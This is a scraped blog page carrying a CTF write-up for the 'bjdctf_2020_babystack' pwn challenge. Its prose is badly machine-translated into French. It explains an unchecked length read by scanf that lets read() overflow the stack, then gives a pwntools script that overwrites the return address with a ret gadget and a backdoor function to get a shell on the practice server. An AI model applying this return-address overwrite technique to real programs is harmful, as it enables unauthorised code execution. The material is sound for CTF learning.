当前位置:网站首页>Bjdctf 2020 Bar _ Babystack
Bjdctf 2020 Bar _ Babystack
2022-06-24 07:22:00 【[mzq]】
bjdctf_2020_babystack

checksec Un instant. 64Programme bit Je n'ai rien ouvert ,idaRegardez le programme
mainFonctions
Qu'en penses - tu?readLecture de la fonction0Chaîne (s),J'ai lu "solitude".,scanfNi déborder,On dirait qu'il n'y a pas de problème
MaisscanfUn nombre entré par l'utilisateur est lu et attribué ànbytes ,Et puisreadVa lirenbytesTaille des caractères,C'est - à - dire que nous pouvons déborder n'importe quelle longueur
backdoorFonctions
Lancez cette fonction pour obtenirshell
exp
ret C'est pour équilibrer la pile En fait backdoor Après la fonction +1Ça marche.
from pwn import *
io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn",29159)
elf = ELF("./bjdctf_2020_babystack")
context(log_level="debug",arch="amd64")
backdoor = elf.symbols["backdoor"]
ret = 0x0000000000400561
print backdoor
io.sendlineafter(b"Please input the length of your name:","100")
payload = "a"*16 + "b"*8 + p64(ret) + p64(backdoor)
payload = flat(["a"*16,"b"*8,ret,backdoor])
io.sendlineafter("What's u name?",payload)
io.interactive()

边栏推荐
- How to distinguish PAAS, IAAs and SaaS?
- Maui uses Masa blazor component library
- Intranet learning notes (4)
- 【均衡器】LS均衡器,DEF均衡器以及LMMSE均衡器的误码率性能对比仿真
- [security] how to [host security - hybrid cloud version] support secure access to non Tencent virtual machines
- The latest crawler tutorial in 2021: video demonstration of web crawling
- Huawei cloud image engine service
- Win11笔记本省电模式怎么开启?Win11电脑节电模式打开方法
- Muxvlan principle, Huawei MUX VLAN experimental configuration
- Implementation and usage analysis of static pod
猜你喜欢
![[WUSTCTF2020]爬](/img/b6/4a0582144c3125e7a0666bbbbfe29d.png)
[WUSTCTF2020]爬

Decryption of the original divine square stone mechanism

The first common node of two linked lists_ The entry of the link in the linked list (Sword finger offer)

【Proteus】Arduino UNO + DS1307+LCD1602时间显示

简单使用Modbus转BACnet网关教程

Introduction to raspberry pie 4B development board

【图像特征提取】基于脉冲耦合神经网络(PCNN)实现图像特征提取含Matlab源码

PIP install XXX on the terminal but no module named XXX on pycharm

Software performance test analysis and tuning practice path - JMeter's performance pressure test analysis and tuning of RPC Services - manuscript excerpts

JVM调试工具-jvisualvm
随机推荐
buuctf misc 从娃娃抓起
In JS, the regular expression verifies the hour and minute, and converts the input string to the corresponding hour and minute
0 foundation a literature club low code development member management applet (III)
MFC使用控制台时 项目路径中不能有空格和中文,否则会报错误 LNK1342 未能保存要编辑的二进制文件的备份副本等
[TS] function type
关于取模数据序号定位的说明 区码定位是指GBK编码
第三方软件测试公司如何选择?2022国内软件测试机构排名
MFC多线程 信号量CSemaphore 临界区与互斥 事件
[MRCTF2020]千层套路
Win11怎么设置让CPU性能全开?Win11CPU怎么设置高性能模式?
What is the mentality of spot gold worth learning from
The latest crawler tutorial in 2021: video demonstration of web crawling
Unexpected token u in JSON at position 0
电脑如何打开软键盘,教大家Win10如何打开软键盘的方法
Decryption of the original divine square stone mechanism
Kaseya of the United States was attacked by hackers, and 1500 downstream enterprises were damaged. How can small and medium-sized enterprises prevent extortion virus?
PCL 点云按比率随机采样
Muxvlan principle, Huawei MUX VLAN experimental configuration
[Proteus] Arduino uno + ds1307+lcd1602 time display
JVM調試工具-Arthas